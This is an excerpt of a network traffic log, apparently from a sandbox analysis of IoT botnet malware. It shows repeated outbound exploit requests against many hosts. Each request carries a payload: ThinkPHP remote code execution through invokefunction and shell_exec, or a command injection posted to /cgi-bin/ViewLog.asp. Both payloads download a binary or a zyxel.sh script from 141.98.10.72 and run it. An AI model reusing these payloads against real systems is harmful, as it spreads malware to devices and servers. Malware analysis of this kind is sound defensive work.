                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      886192.168.2.153284495.85.26.1780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.921987057 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      887192.168.2.153955695.143.181.9880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.937642097 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.149852037 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:31:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      888192.168.2.155836894.120.238.988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.945087910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      889192.168.2.155939494.123.156.1348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.945190907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      890192.168.2.155402294.121.30.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.946006060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      891192.168.2.153936895.81.32.4180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.951399088 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.181289911 CET59INHTTP/1.1 400 Bad Request
                                                      Connection: close
                                                      Feb 14, 2024 09:30:53.831242085 CET59INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      892192.168.2.153472095.215.140.780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.968460083 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.214416027 CET224INHTTP/1.1 404 Not Found
                                                      Content-type: text/html
                                                      Content-Length: 0
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Frame-Options:SAMEORIGIN
                                                      Set-Cookie:Secure; HttpOnly
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      893192.168.2.154498095.100.205.680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:52.970267057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.215071917 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 65 63 61 34 64 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 33 26 23 34 36 3b 36 63 32 35 65 33 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4eca4d68&#46;1707899453&#46;6c25e395</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      894192.168.2.154623095.181.231.22680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.105817080 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:53.477621078 CET932INHTTP/1.1 400 Bad Request
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 681
                                                      date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      895192.168.2.155120894.131.62.2378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.391200066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.510370016 CET1260INHTTP/1.1 400 Bad Request
                                                      Server: squid/6.0.0-20220501-re899e0c27
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 3572
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Vary: Accept-Language
                                                      Content-Language: en
                                                      Cache-Status: ezproxies.com
                                                      Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      896192.168.2.156040031.104.105.1248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.481455088 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.745784044 CET626INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:30:53 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      897192.168.2.155898031.136.83.1458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.493603945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.663599014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:02.807460070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.839095116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694444895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      898192.168.2.154048294.122.197.1998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:53.521548033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
